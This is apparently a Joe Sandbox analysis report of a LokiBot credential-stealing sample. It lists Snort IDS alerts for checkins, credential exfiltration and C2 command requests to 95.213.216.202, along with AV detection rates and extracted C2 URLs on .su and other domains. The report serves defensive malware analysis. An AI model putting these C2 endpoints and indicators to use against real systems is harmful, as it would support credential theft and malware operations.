Timestamp:	192.168.2.695.213.216.20249720802825766 11/24/22-19:54:54.960633
SID:	2825766
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853107532014169 11/24/22-19:54:21.991089
SID:	2014169
Source Port:	53107
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249702802825766 11/24/22-19:54:25.054966
SID:	2825766
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249744802025381 11/24/22-19:55:45.028740
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497512025483 11/24/22-19:56:01.147373
SID:	2025483
Source Port:	80
Destination Port:	49751
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249730802021641 11/24/22-19:55:16.067382
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249743802825766 11/24/22-19:55:42.875605
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249710802024318 11/24/22-19:54:35.914327
SID:	2024318
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249724802825766 11/24/22-19:55:03.741584
SID:	2825766
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249727802825766 11/24/22-19:55:09.788187
SID:	2825766
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497452025483 11/24/22-19:55:48.824554
SID:	2025483
Source Port:	80
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249713802024318 11/24/22-19:54:43.021097
SID:	2024318
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249710802024313 11/24/22-19:54:35.914327
SID:	2024313
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249718802825766 11/24/22-19:54:50.807735
SID:	2825766
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497092025483 11/24/22-19:54:35.412652
SID:	2025483
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497232025483 11/24/22-19:55:03.460307
SID:	2025483
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249697802024312 11/24/22-19:54:11.348011
SID:	2024312
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249707802024313 11/24/22-19:54:31.276699
SID:	2024313
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862520532014169 11/24/22-19:55:15.969759
SID:	2014169
Source Port:	62520
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857322532014169 11/24/22-19:55:39.901358
SID:	2014169
Source Port:	57322
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249713802024313 11/24/22-19:54:43.021097
SID:	2024313
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249697802024317 11/24/22-19:54:11.348011
SID:	2024317
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497262025483 11/24/22-19:55:09.535230
SID:	2025483
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249707802024318 11/24/22-19:54:31.276699
SID:	2024318
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249746802021641 11/24/22-19:55:49.078874
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497012025483 11/24/22-19:54:23.783923
SID:	2025483
Source Port:	80
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249733802825766 11/24/22-19:55:23.201569
SID:	2825766
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249752802021641 11/24/22-19:56:01.434635
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249730802825766 11/24/22-19:55:16.067382
SID:	2825766
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249732802024313 11/24/22-19:55:21.169470
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249726802024318 11/24/22-19:55:07.738200
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249753802025381 11/24/22-19:56:03.443038
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249732802024318 11/24/22-19:55:21.169470
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249705802825766 11/24/22-19:54:27.228813
SID:	2825766
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249746802825766 11/24/22-19:55:49.078874
SID:	2825766
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249755802021641 11/24/22-19:56:06.881877
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249747802025381 11/24/22-19:55:51.131718
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249699802025381 11/24/22-19:54:15.956073
SID:	2025381
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249726802024313 11/24/22-19:55:07.738200
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249749802021641 11/24/22-19:55:55.139215
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249698802825766 11/24/22-19:54:13.981663
SID:	2825766
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249727802021641 11/24/22-19:55:09.788187
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852715532014169 11/24/22-19:56:06.802187
SID:	2014169
Source Port:	52715
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852079532014169 11/24/22-19:55:21.075805
SID:	2014169
Source Port:	52079
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861833532014169 11/24/22-19:55:25.100624
SID:	2014169
Source Port:	61833
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249706802025381 11/24/22-19:54:29.062049
SID:	2025381
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249733802021641 11/24/22-19:55:23.201569
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249751802024318 11/24/22-19:55:59.376338
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249752802825766 11/24/22-19:56:01.434635
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249712802025381 11/24/22-19:54:40.926341
SID:	2025381
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249711802825766 11/24/22-19:54:38.624655
SID:	2825766
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Payment_copy28476450.exe	ReversingLabs: Detection: 35%
Source: Payment_copy28476450.exe	Virustotal: Detection: 41%			Perma Link

Antivirus detection for URL or domain

Source: http://sempersim.su/gl20/fre.php

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: sempersim.su	Virustotal: Detection: 25%			Perma Link
Source: http://sempersim.su/gl20/fre.php	Virustotal: Detection: 26%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Virustotal: Detection: 22%	Perma Link
Source: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	Virustotal: Detection: 22%	Perma Link

Machine Learning detection for sample

Source: Payment_copy28476450.exe

Joe Sandbox ML: detected

Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Source: Payment_copy28476450.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: wcycejenv.exe, 00000001.00000003.254413056.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, wcycejenv.exe, 00000001.00000003.252943268.0000000002630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wcycejenv.exe, 00000001.00000003.254413056.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, wcycejenv.exe, 00000001.00000003.252943268.0000000002630000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405620
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,	0_2_00405FF6
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004049D0 lstrcpyW,GetEnvironmentVariableW,lstrcpyW,lstrlenW,lstrcpyW,_wcsrchr,lstrcpyW,GetEnvironmentVariableW,lstrcpyW,lstrcpyW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,lstrlenW,GetFileAttributesW,lstrcatW,FindFirstFileW,FindClose,lstrcpyW,GetFileAttributesW,_wcsrchr,FindExecutableW,SHGetFileInfoW,CreateProcessW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,	1_2_004049D0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00405030 lstrcpyW,lstrcatW,lstrcatW,lstrlenW,GetFileAttributesW,lstrcatW,FindFirstFileW,FindClose,GetFileAttributesW,	1_2_00405030
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00431227 FindFirstFileExW,	1_2_00431227
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004315E3 FindFirstFileExW,FindNextFileW,FindClose,	1_2_004315E3
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	3_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53731 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49697 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49697 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49697 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49697 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49697 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57686 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49698 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49698 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49698 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49698 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49698 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64382 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49699 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49699 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49699 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49699 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49699 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49699
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53203 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49700 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49700 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49700 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49700 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49700 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49700
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53107 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49701 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49701 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49701 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49701 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49701 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49701
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64601 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49702 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49702 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49702 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49702 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49702 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49702
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49786 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49705 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49705 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49705 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49705 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49705 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49705
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58595 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49706 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49706 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49706 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49706 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49706 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49706
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56331 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49707 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49707 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49707 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49707 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49707 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49707
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50506 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49709 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49709 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49709 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49709 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49709 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49709
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49448 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49710 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49710 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49710 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49710 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49710 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49710
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59082 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49711 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49711 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49711 -> 95.213.216.202:80
